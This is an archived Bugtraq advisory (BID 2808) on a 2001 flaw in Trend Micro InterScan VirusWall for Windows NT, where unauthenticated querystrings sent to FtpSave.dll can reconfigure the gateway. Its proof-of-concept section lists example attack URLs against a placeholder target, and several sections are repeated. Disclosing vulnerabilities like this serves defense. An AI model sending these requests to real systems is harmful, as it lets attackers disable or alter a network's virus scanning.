Trend InterScan VirusWall Remote Reconfiguration Vulnerability
BID:2808
Info
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
| Bugtraq ID: | 2808 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 24 2001 12:00AM |
| Updated: | May 24 2001 12:00AM |
| Credit: | Reported to bugtraq by [email protected] <[email protected]> on May 24, 2001. |
| Vulnerable: |
Trend Micro InterScan VirusWall for Windows NT 3.51 Trend Micro InterScan VirusWall for Windows NT 3.5 Trend Micro InterScan VirusWall for Windows NT 3.4 |
| Not Vulnerable: | |
Discussion
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
Interscan Viruswall is a Virus scanning software package distributed and maintained by Trend Micro. It is designed to scan for virus occurances in both incoming and outgoing traffic via SMTP, FTP, and HTTP at the gateway of the network.
The management interface used with the Interscan Viruswall uses several programs in a cgi directory that may allow a remote attacker to make configuration changes using maliciously-constructed querystrings submitted to the host.
Interscan Viruswall is a Virus scanning software package distributed and maintained by Trend Micro. It is designed to scan for virus occurances in both incoming and outgoing traffic via SMTP, FTP, and HTTP at the gateway of the network.
The management interface used with the Interscan Viruswall uses several programs in a cgi directory that may allow a remote attacker to make configuration changes using maliciously-constructed querystrings submitted to the host.
Exploit / POC
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
Examples:
http://target/interscan/cgi-bin/FtpSave.dll?no
http://target/interscan/cgi-bin/FtpSave.dll?yes
http://target/interscan/cgi-bin/FtpSave.dll?I'm%20here
Examples:
http://target/interscan/cgi-bin/FtpSave.dll?no
http://target/interscan/cgi-bin/FtpSave.dll?yes
http://target/interscan/cgi-bin/FtpSave.dll?I'm%20here
Solution / Fix
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
Solution:
There are currently no patches available.
Trend Micro's support team has notified sources that this problem will be fixed in Version 5.0. They reported also the patched version will be released in July, 2001.
Solution:
There are currently no patches available.
Trend Micro's support team has notified sources that this problem will be fixed in Version 5.0. They reported also the patched version will be released in July, 2001.
References
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
References:
References: